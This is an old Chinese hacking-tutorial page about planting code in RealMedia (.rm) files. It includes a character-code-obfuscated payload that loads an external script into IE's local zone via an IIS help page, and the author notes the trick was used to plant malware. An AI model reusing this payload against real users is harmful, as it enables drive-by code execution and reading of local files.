当前位置: 首页 > 图文教程 > 网络安全 > 黑客技术 > rm格式插入广告代码

黑客技术
拥有高超的本领 黑客速成学习法
侵250万台电脑盗千万巨款 18岁黑客落网
世界第一批黑客高手浮出水面
史上最牛军方网络黑客就引渡至美国上诉
少年领导“黑客”团伙 侵入全球130万台电脑
如何用木马取得远程电脑上QQ聊天纪录
看黑客如何入侵Linux操作系统
黑客如何利用文件包含漏洞进行网站入侵
密码遗忘破解方法大汇总
警惕木马“恋”上贺岁大片
解析新时代的黑客攻击技术
浅谈ARP欺骗类病毒的防治思路
九个方法防范垃圾邮件
黑客域名劫持攻击详细步骤
常用的密码破解方法大汇总
回顾中国黑客的发展里程
黑客攻击新技术:机遇型攻击
Flash动画被黑客用来实施攻击
中国黑客自己的历史
简单方法查找攻击者的老巢

黑客技术 中的 rm格式插入广告代码


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-13   浏览: 93 ::
收藏到网摘: n/a

很久以前就有这个东西,当时都是用来挂马的,不过忽然想起来,如果能跳到javascript:这样的格式在本地执行js代码意义还是有点的吧,于是测试了下.结果很让人沮丧,realplay对这个好象倒是有限制,而且查看被插入的rm文件里看出应该是本身就做了限制,看来支持的协议不多啊....于是试试file:///,结果发现是支持的,于是想到前段时间的html injection,如果加起来应该有点效果.
复制代码 代码如下:

u 00:00:02 00:00:05 file://C:\WINDOWS\Help\iisHelp\common\400.htm#javascript:document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,47,116,101,115,116,46,106,115,62,60,47,115,99,114,105,112,116,62))/


这段代码插进去会出现一个诡异的连接,点击下会执行我指定的js(微软的工程师还是很小心的,暂时正常情况下找到的html就这一个,而且还要点......),而且事实证明的确是本地域执行的,可以读本地的文件,呵呵......而且在realone播放的情况下,ie那个本地执行js代码的警告居然会神奇地消失,于是放到html页面播放,果然很郁闷,打开任何html都会警告,不过还是神奇地能打开本地域的文件.....正常下用window.open是不可以的.....域的限制是可以突破,希望能找到个本地存在问题的html就OK啦,呵呵.......
真希望这些边缘的地方能出点问题,我感觉还是可能的 :)